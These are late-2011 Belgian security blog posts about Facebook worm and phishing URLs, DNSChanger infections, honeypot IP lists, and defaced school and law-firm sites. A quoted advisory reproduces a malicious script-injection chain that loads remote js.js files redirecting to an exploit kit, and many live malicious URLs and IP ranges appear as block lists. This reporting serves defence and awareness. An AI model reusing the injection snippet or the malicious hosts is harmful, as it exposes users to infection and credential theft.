11/30/2011

how not to hide your documents (vlaanderen and controversial projects)

well some one asked me how to control everything that changes on a website

and than I told them that Google was the best friend for the researcher

because so many documents and so much information is put online before it becomes public

that with a few google trics you can find them from the moment they are online

 

today some friends of them said in the press that they were against the new plans of the Harbor of Antwerp and told the press that they were very unhappy about the way the plans were being prepared without any popular or democratic consultation

how did they know ?

well it was already all on the website

http://www2.vlaanderen.be/ruimtelijk/grup/00200/00202_00001/index.html

not even on a closed extranet and not even with a password

just there for anyone to find if they could fill in the right searchtricks in Google and know what to look for

it is not because it is not on the frontpage of the website, that it isn't on the website....

Permalink | |  Print |  Facebook | | | | Pin it! |

11/29/2011

facebookworm block these sites

links that the bankstealing facebook worms uses to infect the users

do not click on a picture of two blondes

well in fact be always very careful on which links you click on facebook

they said that they had now all necessary security in place

hxxp://www.offi sense.co.il / lang / b.exe

hxxp://www.vinam ost.net
hxxp://www.ferry. coza
hxxp://www.maxim ilian-adam.com
hxxp://www.bacol odhouseandlot.com /
hxxp://www.servi ceuwant.com
hxxp://www.centr alimoveisbonitoms.com.br
hxxp://www.werea d.in.th
hxxp://www.villa matildabb.com
hxxp://www.fiona gh-Bennett-music.co.uk
hxxp://www.uksei katsu.com
hxxp://www.bzoe- salzkammergut.at
hxxp://www.delic escolres.com
hxxp://www.dekie viten.nl

Permalink | |  Print |  Facebook | | | | Pin it! |

facebook phishing websites

do always log in to facebook by typing manually facebook.com in your browser, period

do this also for other important services

clicking on links in mail or on websites is not very intelligent if your service is very important

these are dangerous sites and it is also very strange that people can buy sites with the word facebook or a variant in it without having any rights on the name facebook and that some of the domains are part of an European domainextension

http://www.sanagustinturismo.co/Facebook/

 

http://www.facebook.pcriot.com/login.php

 

http://deadlyplayerx.binhoster.com/Facebook/securelogin.php

 

 

 

http://facelook.shop.co/login.php

http://sigininto.horizon-host.com/facbook/facebook.php

http://custom-facebook.info/facebook.htm

http://www.profile.co.gp/facebook/photo.phpfbid=12447510&set=a.478812.I41224&type=1&theater.html

http://s6.mywibes.com/facebook.htm

 

http://www.fjtech.us/

http://myoneid.site90.com/

 

http://facedook.co.gp/wwwfacebookcomprofilephpid100001548737188.htm

http://faceebook-com.bugs3.com/login/Secured_Re-login/index1.html

http://facebooook.axfree.com/

http://combatarms.free.fr/

http://sweed.web44.net/

http://thekshitij.in/facebook/index1.html

http://addgames.awardspace.biz/

http://www.profile.co.gp/facebook/

http://www.sjscheat.com/Hosting%20blogger/facebook

http://h1.ripway.com/denal/

http://1337r00t.13.ohost.de/r00tw00tkn00wn/

http://faacebok.zapto.org/

http://h4ck3rgadungan.adfoo.info/index1.html

http://www.2498.b.hostable.me/

 

___________________________________

 

+ Updated (28.11.2011):

 

http://www.facebook.reekcreations.com/

http://wvw.facebook.com-photos.php.id.1574348425.jgold.in/

http://fan-pages.vgig.ir/facebook.com.home.php.sk-2361831622.applicationspage/

http://timkoch71.net46.net/1638765386283/facebook/

http://privacy-facebook-it.f11.us/check_privacy.htm

http://www.configsetting.com/facebook/login.htm

http://facebook-beta.kilu.de/facebooklogin.html

http://www.frfacebook.fr/

http://fun4iran.tk/facebook.unfiltered/Index.htm

http://login.eu.nu/facebook/photo.phpfbid=1248427590010&set=a.1292457490730.34590.1809072438&type=1&theater.html

source http://security.web-center.si/?p=75

 

Permalink | |  Print |  Facebook | | | | Pin it! |

PWC makes it advertising cybersecurity report public

every year there is a whole bundle of very expensive paper (or trees) wasted on so-called reports that are being based on so-called interviews or surveys with very knowledgeable people about cybersecurity or one aspect of it

for pwc fraudprevention and frauddetection is very important so the whole 'survey' is being written as kind of promotion folder to promote fraudprevention and other services they offer.

the fact that they do it every year, doesn't proof a thing and that some professor comes along to give it some 'scientific' worth doesn't change a thing

it is publicity and there is nothing in it that is worth spending time on and there are a hundred questions one could ask about the way questions are asked or why only different aspects of cybersecurity are taken into considerations while others are totally forgotten

http://www.pwc.com/en_GX/gx/economic-crime-survey/assets

but for laughs, some of the conclusions

 

 

Fraud, the fraudster  and the defrauded

 

• 34% of respondents experienced economic crime in the last 12 months (up from 30% reported in 2009)

 

• Almost 1 in 10 who reported fraud suffered losses of more than US$5 million

 

• Senior executives made up almost half of the respondents who didn’t know if their organisation had suffered a fraud

 

• 56% of respondents said the most serious fraud was an ‘inside job’

 

• Suspicious transaction monitoring has emerged as the most effective fraud detection method (up from 5% in 2009 to 18% in 2011)

 

• Organisations that have performed fraud risk assessments have detected and reported more frauds.

 

Cybercrime

 

• Cybercrime now ranks as one of the top four economic crimes

 

• Reputational damage is the biggest fear for 40% of respondents

 

• 60% said their organisation doesn’t keep an eye on social media sites

 

• 2 in 5 respondents had not received any cyber security training

 

 

• A quarter of respondents said there is no regular formal review of cybercrime threats by the CEO and the Board

 

 

• The majority of respondents are not aware of having, or do not have a cyber crisis response plan in place


game : find the biggest contradictions between the two lists of results knowing that a majority of the respondents were management of some kind

 

Permalink | |  Print |  Facebook | | | | Pin it! |

#belsecparty starting thursday 1st december online here

yeah a real party :)

things to have fun with

or wild things that happen at a party :)

if you have stuff for the party (belgian stuff that is)

you can mail it to me

as you see - things are already arriving slowly

you don't have to hack the UN server as the teampoison crew did for the birthday of their crewleader

 

sending an ecard is also nice (without a virus this time)

 

for those who are nervous, I am not a hacker and not lulzsec or antisec

but I am pissed off about the general insecurity of the belgian networks and websites

so the time of the omerta is over

every announcement to the cert.be will have its time-limit

 

just that you understand

the FCCU is arresting young Belgian teenagers who are hacking or trying to hack from their own PC at home

(they should better recruit them for other Belgian state services like they do everywhere around the world, .....)

 

for those who have forgotten

1 million visitors at belsec

around 1 million at the others

1O years in ITsec professionally

Permalink | |  Print |  Facebook | | | | Pin it! |

Teampoison hacks UN server and start releasing passwords (also belgians)

the information has been sent to the cert.be

for those who know where to search my resources they can find the list and file

it shows another time that only double identification (no, the EID is NOT ready for this sorry) will have to become the norm - but more about that next week during the #belsecparty (as if this ain't already a party :) )

it shows that nothing is totally secure and that in important and big infrastructure without strict monitoring and policies there is always something that isn't followed up as should be

it shows that every organisation should have a policy in case some of its users will use its passwords online or some of its infrastructure (with members) will be leaked online

in this case the victims will have to change every passwords that looks like their password for every service online and their administrations will have to cut all access to all external resources as long as they aren't sure that every interaction with that account is normal

what is strange is that Teampoison is normally the anti #antisec #lulzsec man because he tried everything to dox them, to leak information about them and to bring down their servers or websites

You can follow that kind of discussions and actions at twitter.com/mailforlen  look in lists and take the first 'leaks and dumps' to which you can subscribe (and should subscribe if you are in intelligence or security)  If you think I am missing some twitters that are essential (and do more than only retweeting or bragging without doing something) you can send them or tweet them to me for inclusion

it is normal that teampoison has hacked the UN because he seems more like the rightwing anti islamic, anti-liberal patriot shoot first and ask later type of guy for which the UN is probably part of a conspiracy.

hacking, ddossing and leaking are just methods that are now available to every nut and activist alike

this is the new revolutionary trend for 2011 and although a lot of people have been arrested or have retired because they fear being arrested for every 10 arrested there will always pop somewhere one new one up who may make a difference for some time untill he also gets arrested

ps the passwords are too small (go to passphrases - long sentences - and that you can do immediately)

Permalink | |  Print |  Facebook | | | | Pin it! |

tips to stay anonymous on the web as blogger

the first one being not using Google adwords or analytics

  • Don't use Google Analytics or any other third-party embed system. If you have to, create a new account with an anonymous email. At the very least, create a separate Analytics account to track the new domain. (From the "My Analytics Accounts" dropdown, select "Create New Account.")

  • Turn on domain privacy with your registrar. Better, use a hosted service to avoid domain payments entirely.
  • If you're hosting your own blog, don't share IP addresses with any of your existing websites. Ideally, use a completely different host; it's easy to discover sites on neighboring IPs.
  • Watch your history. Sites like Whois Source track your history of domain and nameserver changes permanently, and Archive.org may archive old versions of your site. Being the first person to follow your anonymous Twitter account or promote the link could also be a giveaway.
  • Is your anonymity a life-or-death situation? Be aware that any service you use, including your own ISP, could be forced to reveal your IP address and account details under a court order. Use shared computers and an anonymous proxy or Tor when blogging to mask your IP address. Here's a good guide.

http://waxy.org/2011/11/google_analytics

Permalink | |  Print |  Facebook | | | | Pin it! |

#belsecparty Exclusive the list of 1400 Belgian IP addresses infected with the Estonian DNS-changer botnet

this information has been given by Arbor Networks, thanks

this information are the Belgian IP Addresses that contacted the new clean DNS servers from the ISC that intercept all the traffic to the malicious dns servers from the Estonian gang

these are only the IP addresses that were infected by the software-malware that was installed by this gang and not by any other variant that has gone out since

the FBI has together with a group of private and public american and international institutions, groups and enterprises stopped the operation after a 2 year investigation

These Belgian IP addresses ARE infected with this botnet and need to be cleaned and secured again.

What is the virus

Instead of infecting your machine with a virus who tries to visit itself a website or server they only change the dns of your machine so that you will never detect that you were infected (if nothing else is being installed). Some variants also left a mark because they disabled the antivirus on the machines.

The dns is one of the most important aspects of the  internet because it changes the number of the server on which you are (the IP address) into the domainname we all know and type. Imagine that you would have to type in a telephone number in your phone but a name and that the phone would connect to a server and would itself search for the telephone number(s). As servers change often and as website also change from location it would otherwise be impossible to 'surf' the net.

The dns is for this reason mentioned in the characteristics of your pc, your router and your network. It can be changed at any place except for the server that is authoritative (trusted) for this domain.

Why this virus

It is clear from the description that this is the best way for the underworld to make much money on an industrial scale without having to invest much money in vulnerabilities and changing servers and so on. In fact if you want your victims to go to another server and download or click something, than you only have to change it in your dns server. This is also the case with the poisoning of the dns server in which the results for a site (for example the ip address for ebay.be is a server in Russia and not in the US) but as dns servers become better defended and monitored this has become harder.

Who can get this virus

One thing that is clear from this virus is that it has been adapted. It works on Macintosh, linux, windows and on routers (homerouters or networkrouters). THe only thing it wants to change is redirecting all the internettraffic through its own malicious dns servers.

How can I control if I was infected

If you were online the 28th of november and you aren't in this list, than that is a good sign

You can also check online with the FBI database

https://forms.fbi.gov/check-to-see-if-your-computer-is-us...

If you are infected, the FBI is looking for victims for its courtcase against these cybercrooks (who made 14 million dollars over 2 years)

 

https://forms.fbi.gov/dnsmalware   looking for victims

 

The malicious dns ranges are these

 

85.255.112.0 - 85.255.127.255
67.210.0.0 - 67.210.15.255
93.188.160.0 - 93.188.167.255
77.67.83.0 - 77.67.83.255
213.109.64.0 - 213.109.79.255
64.28.176.0 - 64.28.191.255

 

You can find them with the following operations on your machine (for your routers at home and in the enterprise you should look in the documentation).

For networks we would advise you to put these ranges in your dns rule as blocked and logged so you can see if any machine in your network has been infected. THe best policy is to divert all your dns traffic to an internal dns server who will forward all the external dns traffic to some other defined external dns servers. Bad dns traffic should be logged or send to the firewall for closer examination.

It is also not a bad idea to install wireshark or another network traffic monitoring and to look for infections. Posts that are infected will probably also be infected with other malware or botnets.

 

check DNS settings on Windows open a command prompt and type "ipconfig /all" and then check the DNS Server field.

check DNS settings on a Mac, choose System Preferences and then select Network. Then click on the Advanced button of the active connection. Users may also want to check the DNS servers used by their router.

 

check DNS settings on a Linux:  cat /etc/resolv.conf.

 

How to clean it

For Macintosh you have this Free tool

http://macscan.securemac.com/files/DNSChangerRemovalTool....

For windows there are a bunch of free antivirus tools like avast and avg that will do the job. if you install a firewall you make also a rule excluding

 


The Belgian list of infected IP addresses 28th of November

the Ip addresses in excell were a bit of a hassle sometimes but you only have to see it as an ip address (leaving the ,00 out at the end)

the easiest format to download is excell

DNS Changer List Ip

Permalink | |  Print |  Facebook | | | | Pin it! |

11/28/2011

#belsecparty present from arbor networks : bad sites and clients on Belgian internet today

MALICIOUS CLIENTS


Attacking clients
Based on ATLAS honeypot sensors.
81.188.106.89,
62.166.195.172,
80.201.10.160,
109.128.247.183,
84.198.19.2,

Scanning belgian computers looking for victims
Based on ATLAS honeypot sensors.
85.201.85.208,
130.104.72.213,
134.58.253.55,
62.166.195.172,
109.132.235.135,
87.66.29.248,
81.247.252.210,
81.240.85.87,
134.58.253.57,
91.177.170.44,
81.242.196.34,
81.83.1.205,
87.64.142.48,
81.164.109.187,
109.129.4.123,
80.201.10.160,
85.10.82.156,
87.67.8.112,
91.177.162.184,
87.64.32.187,
83.101.33.81,
81.247.166.83,
109.129.0.66,
84.199.64.130,
193.190.253.146,
91.177.87.184,
85.26.3.28,
80.236.194.51,
85.26.34.179,
87.64.165.5,
78.129.6.138,
85.10.81.71,
78.21.150.79,
87.65.39.242,
194.78.218.172,
87.66.57.148,
83.101.43.178,
85.28.69.102,
109.128.16.176,
91.178.111.72,
91.177.19.225,
91.182.43.197,
84.192.204.59,

Phishing Servers
Based on internal link analysis and third-party reports.
CC, ASN, IP, port, URL
BE, 9031, 85.234.212.11, 80, "http://www.lacavedubailli.be/free.fr/index=1019649346/"
BE, 16276, 87.98.253.10, 80, "http://koletrezzo44.ru/_cp/gate.php"
BE, 39318, 77.73.100.155, 80, "http://www.everyoneweb.com/gratiscreditsvoorhabbo123123/"
BE, 39318, 77.73.100.155, 80, "http://everyoneweb.com/wp/Presentation_tier/Index.aspx?We..."
BE, 16276, 87.98.253.10, 80, "http://koletrezzo55.com/_cp/gate.php"
BE, 16276, 87.98.253.10, 80, "http://koletrezzo44.com/_cp/gate.php"
BE, 6848, 81.82.246.211, 80, "http://d5152f6d3.static.telenet.be/phpmyadmin2/de34df234r..."

Malicious Links
URLs contacted by malware during automated analysis.
Timestamp, CC, ASN, IP, URL
1322493197, BE, 39318, 188.93.153.72, "http://www.fla-ts.be/downloads/Demo_Draaitijd_Fla_lvn.exe"

Permalink | |  Print |  Facebook | | | | Pin it! |

#belsecparty more announcements (beginning the 1st of december for 10 days)

we will be closing a whole set of websites and blogs here and over the web and will be republishing the most interesting stuff that was published over time

and where necessary the links will be controlled

so look forwards for 'going back in time' and 'being remembered about some things' and seeing how

'so little has changed over the years in so many ways'

you may be surprised and find some interesting articles made up from several blogpostings combined

I don't think that on for Belgians there will be another 'Belgian historical Itsecurity' resource like this

more information will follow

 

tips, research, publications and other things to add at the party are always welcome

in this land where silence is golden

Permalink | |  Print |  Facebook | | | | Pin it! |

11/27/2011

belgian sites from lawyers hacked (in the us)

2011/11/26 DR-MTMRD H M   United States   www.lexadvocaten.be Win 2003 mirror
2011/11/26 DR-MTMRD H M   United States   www.advocaat-leliaert.be Win 2003 mirror
2011/11/26 DR-MTMRD H M   United States   www.versus-advocaten.be Win 2003 mirror
2011/11/26 DR-MTMRD H M   United States   www.advocatentorhout.be Win 2003 mirror

so these belgian lawyers are hosted in the us and will now see what it is better to be hosted in Belgium because it will be very difficult to get the logs in time if you go to the fccu or ecops

secondly they were hosted on older servers and so their webmaster didn't act as a responsable father and so it was only a matter of time until they got hacked

and how can they now be sure that their information wasn't leaked and that clients are compromised or that their communications on and through the websites (and eventually any other linked or logged in computer) will be monitored by undiscovered trojans

yeah, maybe farstretched but aren't lawyers not doing that also .....

it is all technically possible

Permalink | |  Print |  Facebook | | | | Pin it! |

big belgian server with numerous school sites hacked

linux - apache

anyone responsable there thinks that just taking it offline will be sufficient

any personal data lost maybe

2011/11/26 SA3D HaCk3D H M   Belgium   campushetspoor.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   atheneumherentals.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   atheneumaalst.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   bs-dewijngaard.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   bswilgenhof.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   bsfaluintjes.be Linux mirror
2011/11/26 SA3D HaCk3D H M R Belgium   alteagenk.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   destadsmus.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   ka-mol.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   sgw28.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   freinetschoollille.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   ictsgr21.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   kaoudenaarde.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   dewatersportschool.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   abrahamhans.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   msliedekerke.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   gibbon-vzw.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   msherentals.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   ktadepanne.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   clb9mechelen.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   dekrekel-degrasspriet.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   cvo-kempen.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   degroenevijver.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   campusmaasland.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   kta-mol.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   debrugerpe-mere.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   internaatkeerbergen.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   dezilverberk.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   ktaliedekerke.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   ibsodehorizon.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   atheneumlokeren.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   bsklavertje.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   omerwattez.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   europaschoolgenk.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   kadenderleeuw.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   sgrdender.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   onderwijswesthoek.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   kaavelgem.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   middenschoolmol.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   freinetherentals.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   horizonaalst.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   verstandig.be Linux mirror
2011/11/26 SA3D HaCk3D H M R Belgium   gitbo.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   toverbeek.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   syn-ack.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   muziekacademieschaarbeek.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   de-zonnewijzer.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   spelenmettechniek.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   mpizonneken.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   campusminneplein.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   ktakapellen.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   bsdepolyglot.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   kta-zavelenberg.be Linux mirror

Permalink | |  Print |  Facebook | | | | Pin it! |

play-online.bzh.be hacked and accounts leaked

the most leaked accounts seem to be polish or russian

but it is a Belgian domainname and so the question is who is responsable because it falls as a Belgian website under the Belgian law and so under its privacylaws

other question that may be posed is who will inform those russian and polish users that their accounts are leaked and that if they have used the same passwords for other services they can be scammed and hacked 

is it the website owner who have left no message on its server that they were hacked

and will they be hold accountable

or is it the underfinanced belgian cert who will have to do that or contact the Polish and russian cert to contact the users

and now it is only a small number of accounts, but what if we are talking about thousands of accounts

neither the Belgian cert nor any other cert nor even most of the webservices have put any procedure and the necerssary resources into place to respond effectively and fast to these situations

and no I won't show here the accounts because it is the least I can do (it is sunday night and the CERT in Belgium is closed)

Permalink | |  Print |  Facebook | | | | Pin it! |

11/26/2011

#belsecparty already four exclusives waiting for the december festivals

why party ?

I am this year working since 10 years in the security-aspect of IT

I am blogging this year since 7 years about ITsecurity in general with close to 3 million visits over all

the belsecblog reaches it one millionth reader after 4 years servicing for free the infosearchers

the belsecblog has been the last year working hard to help the innocent belgians caught up in the Lulzsec campaigns and public leaking of accounts

personally it is my own birthday and some other things to remember

so for 10 days I will party online like

the easiest to follow the flood of messages during 10 days that are programmed to be released every hour of the day during 10 days is to follow from the firs of december #belsecparty in twitter or this feed

also

* get downloadspace and jdownloader

* tell your wife to shut up and give you some time to download stuff

* get popcorn, monster drinks and good deep house or 80's waves or gummy funk or latin hot ladies or cool jazz

* clean your screen and get some boxes

* get a tablet to read all those articles and links to books

* install a second computer ready to use all that securitytest software passing by

* keep an eye on the vulnerable belgian websites passing by

* remember the reposts and releases passing by

* have a look at the hard comments and setting the record clear

 

you can send in stuff as much as you like

anonimity is guaranteed

 

all releases of new information will be mentioned to the CERT some time before

if you receive a message from the CERT that your network or site has a problem and that it will be released between the first and the tenth of december, you better follow up on it

but nothing will be a direct and immediate danger to critical infrastructure or financials (they have busted their own business already bad enough)

no files are hosted by me and the uptime of files is not guaranteed

the coming week will be quite calm as everything is being programmed for friday to start a week of party and mayhem :) If you know that I am in my forties you know which movements and music influenced me when I was younger and inspired me (it is not for nothing that the Occupy movement is a crossgenerational movement)

Permalink | |  Print |  Facebook | | | | Pin it! |

11/24/2011

userspace belgian Isp's not checked on malware and is launchbase for malware

although the Belgian Isp's promised that they would secure themselves their infrastructure and their networks if the Belgian parliament didn't enforce the obligation in the New Telecom Law that would oblige them to give every user a free license for a security package, this doesn't mean that it is done and that they continue to do the necessary efforts

since a few months we see memberpages infected with malware and redirectlinks

not in huge numbers - but enough to get our attention and to be able to say that it wouldn't be a bad idea to virusscan often their own 'userspace' and block pages that are unsafe for one reason or another

just as an example

 

skynet

http://safebrowsing.clients.google.com/safebrowsing/

telenet

http://support.clean-mx.de/clean-mx/viruses?id=1091663

chello

http://support.clean-mx.de/clean-mx/viruses?id=1089502

Permalink | |  Print |  Facebook | | | | Pin it! |

.sys infections (tdl) are becoming more widespread (and tools)

security is a dynamic business

every time you think that you have found the solution and that you can protect your environment, the attacks are becoming so different and the way of infection has so changed, that you have to look at new solutions and limitations to keep the same level of security

so when rootkits TDL v* started infecting .sys files, the antivirus and protectionmechanisms weren't ready for it

"They infect a different .sys driver on the system at each infection, and when you try to recover the sys file, it will give you the clean file, and that (besides others) is a common characteristic between them"

this mechanism is now according to the Internet storm center becoming more widespread

the problem is that your antivirus is not necessarily uptodate for this

you will need for this reason to use one (or several if you are paranoid enough) of these free tools

TDSSKiller.exe - Kaspersky 

AntiZeroAccess - WebRoot 

RootkitRemover - McAfee

the fact that your normal antivirus doesn't show it doesn't necessarily mean that you aren't infected

(this is also a reminder that controlling and filtering your webtraffic is a necessary if you really want to find infections before they spread or cause havoc)

Permalink | |  Print |  Facebook | | | | Pin it! |

new malicious link injection and redirection method

1) Phishing email contains a link to a website

2) The website contains four links like:

 #h1#WAIT PLEASE#/h1#

 #h3#Loading...#/h3#

#script language="JavaScript" type="text/JavaScript" src="hXXp://www.kvicklyhelsinge[.]dk/js.js"##/script#

#script language="JavaScript" type="text/JavaScript" src="hXXp://michellesflowersltd[.]co.uk/js.js"##/script#

#script language="JavaScript" type="text/JavaScript" src="hXXp://myescortsdirectory[.]com/js.js"##/script#

#script language="JavaScript" type="text/JavaScript" src="hXXp://nitconnect[.]net/js.js"##/script#

3) Each JS.JS contains a redirection to a final website that contains the BH Exploit kit:

-> document.location='hXXp://matocrossing[.]com/main.php?page=206133a43dda613f';

That makes really easy for the author to update to new websites, and at the same time, make it harder for a takedown
http://isc.sans.edu/diary.html?storyid=12079

so practical this means the following

* you won't have a simple linkinjection but a scriptinjection in your website

* if you don't see this kind of scripts it will continue to be dangerous for your users, because even if some of these sites have been taken down or were blocked, the attackers can change the ultimate destination anytime (and with some scripting even change it everytime it has been blocked or taken down which we could call fastflux redirecting (which should be scriptable also and which has been used by several viruses the last years)

this is the reason why you will have to set up a system in which you can log, monitor and alert the security and/or webmaster about any non-authorized scriptinclusion (if they can deface it, they can include such scripts)

you can also filter comments and so on by leaving out everything that is code or scripting and only allowing dumb text (this is the cheapest for commentsystems and forums). If someone is interested in the link, he or she will copy-paste it.

Permalink | |  Print |  Facebook | | | | Pin it! |

why Google's Chris DiBona is wrong and dangerous in so many ways

his post has made the headlines in the itsecurity blogosphere and the open-source fanatics

and it shows that aside from some very intelligent ITsecurity guys working in Google, there are also some very stupid ITsecurity unaware people who really need to be held as far away as possible from anything related to itsecurity because they don't understand the basics of it

I can understand that his culture of freewheeling communitybased open source is totally contrary to the strict and controlled environment of a secure software (open-source or not) and I agree that such an environment is necessary to learn, test, experiment and try but these environments are not made for critical things and important data and in many cases shouldn't even be promoted as such on the web

when I start open-source projects I want business support, I want frequent updates and documentation, I want standards and guidelines and I want a way to coordinate and control everything that is happening in it (even if I wouldn't use it for anything too critical)

security is not about open-source against closed source it is about the source and the procedures that you use to keep it safe from the beginning and how you would close and fix security and other issues as fast as possible

both open-source and closed source have given the last years the best and the worst examples of security and mistakes and the whole discussion about open-source being better because it is open-source is just as stupid as linux against windows and apple against windows even if that discussion is back again in full force at his posting

which is a pity because we shouldn't lose any time with that kind of discussions because in the end any company or software will finally arrive at the same conclusion, that there are no thousand different ways of staying secure and informing and helping your user-base and that the techniques and procedures that Microsoft has used and tested over the last years is the best experience around (which is why for example Apple hired Microsoft security staff to re-organise its security of its products).

and the same goes for the mobile environment, there is nothing magical and nothing exceptional about mobile codes and os and people aren't more securitywise because they are mobile and they can be ripped off and scammed as easily (if one reads the articles about the mobile malware in asia where much more people have their internetconnections through mobile stuff). The problem is that the mobile internet finds itself in the same situation as the internet before around 2005. There is between the serviceproviders no security coordination, no securityinstallation on the networks, the app providers don't have the same securitystandards and there is no CERT (in Belgium not) for mobile networks or mobile malware.

but with your mobile you can now pay a lot of services, you can transfer money and you get tens of texts at your costs that will cost you a lot to stop them for sending you such texts so your mobile has become your computer (except if you take a seperate mobile only for your online payment and moneytransfer business).

if Android is for the moment winning the war (even if the popular press is still Apple hypnotized) because it is more flexible and has less control over its apps and installations and so on, it can lose the war in a few months or years from here if it doesn't secure better its environment and its apps because victims will start to complain, governments will start to look into the matter and press articles will start to have an impact and at that time, someone very high up will ask

who is that stupid guy who said that we didn't need any security and that it would work itself out and is he capable of repaying the millions or billions I have lost today (a securitybudget should be minimal about 7 to 10% of your total projectbudget)

security is something no one needs to think about, it should be there from the beginning, being adapted over time and still be protective for 99,99% of your clients all the time

all the rest is ideology and that has no place in this industry

you can also wait untill the mobile operators start securing their networks or the mobile producers will secure them but they will wait untill the politicians will react and they will only react when there are enough victims and than it is nearly too late

so chris, I hope you don't have much leverage in Google and the less you have to do with security the better

Permalink | |  Print |  Facebook | | | | Pin it! |

climategate 2.0 re-released

in what is a perfect example of how an IT black-ops could try to derail an international political event (like an international congress about very important measures against the warming of the earth with enormous business interests at stake) hackers released a few years ago email from the scientists responsable for writing most of the scientific reports that support immediate drastic action and wanted to proof that they were in fact manipulating world opinion, the press and the political leaders.

it may be didn't have an immediate dramatic effect but I am sure that thousands of workhours have been spend by all kinds of people to handle the immediate and longterm effects of the hacking and the after-effects.

so just before another international conference about dramatic international agreements about what to do with the changing of the climate (as if we don't see this happening with our own eyes) another part of the database of stolen emails from 2009 was released (and hyperblogged about by the conservative and pro-business webcampaigns)

the total set of emails is more than 200.000 which are encrypted

the total set of emails that are now leaked is around 5000 and out of that set only a few fragments have been quoted and send around (referring for the full versions to a zipped file on a Russian server - which doesn't mean that they are russians because anyone who wants to hide its identity looks for a country like Russia to host its criminal files although it shows that the Russian authorities do not totally disagree with the actions because otherwise they would have shut down the server as they would do with their own democratic opposition and free press).

so this is a clear example of what is an info-ops, an operation with clearly set information goals in the informationwar about your minds as they would say

just to remember, the reports about the incidents and the emails in question have cleared the scientific discussions that were held in the emails but had some questions about the opportunity of some politicial and PR remarks and rightly so

it also shows that they have now better secured their emailserver because otherwise they would have released new files (or their paymasters didn't want to pay the necessary sum to set up such an operation)

Permalink | |  Print |  Facebook | | | | Pin it! |

there are more ongoing attacks against critical infrastructure than you think

This made me look for other "pastes" by pr0f. What I found:

More Simatic HTML (not clear were it comes from)

http://pastebin.com/wY6XD97L

A Vacuum gauge configuration file from Caltech

http://pastebin.com/TgRTgrAK

A control system from smu.edu. Looks like power generation to me, but may be an experiment, not production

http://pastebin.com/HLNB6SAZ

Another paste, showing the (pretty good) password for a spanish water utility has since been removed.
http://isc.sans.edu/diary.html?storyid=12088&rss

this doesn't mean that these systems have been hacked, they have been attacked or scanned and information about them have been published but that doesn't mean that the control over the infrastructure has been gained and maintained by the hackers

it doesn't mean that cyberwar and the militarization of cybersecurity is necessary

it is more necessary that critical infrastructure is NOT linked to the internet, they should have their own closed networks and bases

Permalink | |  Print |  Facebook | | | | Pin it! |

1 2 3 Next